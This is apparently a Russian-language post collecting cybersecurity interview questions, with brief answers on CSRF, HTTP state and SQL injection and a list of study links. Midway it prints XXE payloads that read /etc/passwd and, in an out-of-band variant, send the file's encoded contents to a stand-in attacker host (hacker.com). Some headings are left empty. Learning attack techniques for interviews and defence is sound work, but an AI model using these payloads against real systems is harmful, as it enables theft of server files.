
Подборка вопросов с собеседований по кибербезопасности, через которые я прошёл, надеюсь, это поможет
Эта страница — сводка собеседований, через которые я прошёл, охватывающая довольно широкий круг ролей; были и отказы, однако я учился на каждом собеседовании, собирал конструктивную обратную связь и двигался дальше. Надеюсь, эти вопросы/советы помогут вам.
Роли, которые оно в целом охватывает, следующие:
Быстрый совет:
Я постарался записать все возможные вопросы, которые мне встречались, и для некоторых дал ответы. Остальные вы можете загуглить, чтобы найти конкретные ответы, если хотите копнуть глубже. Кроме того, в конце есть несколько ссылок, взгляните на них. Они были действительно полезны.
Я с радостью добавлю больше вопросов по мере продвижения и проверки моих заметок, однако буду признателен, если вы дадите конструктивную обратную связь об этом, связавшись со мной по адресу [email protected]. Если вам встретилось что-то, что здесь не описано, не стесняйтесь поделиться.
Что такое CIA?
Что такое AAA?
OWASP Top 10
Что такое XSS (межсайтовый скриптинг, Cross-site Scripting)
Что такое CSRF
Это самый любимый вопрос, который чуть ли не каждый интервьюер обожает задавать
Быстрый совет: Будьте кратки, объясняйте всю историю, только если спросят
Cross-Site Request Forgery (CSRF) — это атака, которая заставляет конечного пользователя выполнять нежелательные действия в веб-приложении, в котором он в настоящее время аутентифицирован. CSRF-атаки нацелены на запросы, изменяющие состояние, а не на кражу данных, поскольку у атакующего нет способа увидеть ответ на подделанный запрос. С небольшой помощью социальной инженерии (например, отправка ссылки по электронной почте или в чате) атакующий может обмануть пользователей веб-приложения, заставив их выполнить действия по своему выбору. Если жертва — обычный пользователь, успешная CSRF-атака может заставить его выполнять запросы, изменяющие состояние, например переводить средства, изменять адрес электронной почты и так далее. Если жертва — административная учётная запись, CSRF может скомпрометировать всё веб-приложение.
Как противостоять CSRF:
Используйте анти-CSRF токены
Используйте политику same-origin
Использование заголовка Referrer
Что такое HTML/URL-кодирование
Является ли протокол HTTP протоколом без состояния (stateless)?
HTTP — изначально протокол без состояния, однако сервер использует cookie, чтобы сделать его сохраняющим состояние
Какие существуют типы инъекций: SQL, Command, OS
Как противостоять SQL-инъекциям
Используйте параметризованные запросы и хранимые процедуры
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Для внедрения: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
Внешний хост: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
В целом буду говорить на примере AWS, однако есть и другие облачные провайдеры, такие как Azure, GCP, Digital Ocean и т.д.
Обучающие ресурсы:
https://regexone.com/ (Регулярные выражения обязательны!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Вопросы по инфобезопасности на собеседованиях:
https://danielmiessler.com/study/infosec_interview_questions
Топ вопросов по пентесту:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Советы по Python:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
Руководство пользователя AWS:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
Понимание SMB и Samba:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/